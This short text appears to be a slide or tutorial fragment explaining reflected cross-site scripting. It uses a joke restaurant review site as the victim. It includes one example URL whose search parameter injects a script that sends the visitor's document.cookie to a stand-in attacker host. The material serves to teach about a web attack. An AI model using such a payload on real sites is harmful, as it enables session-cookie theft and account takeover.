Reflected XSS

The script is executed immediately when the page loads...

www.welp.com?search=<script>window.location='www.haxxed.com?cookie='+document.cookie</script>
The logo A shrug
The indifferent restaurant review site
I guess you should search for food or something.
The victim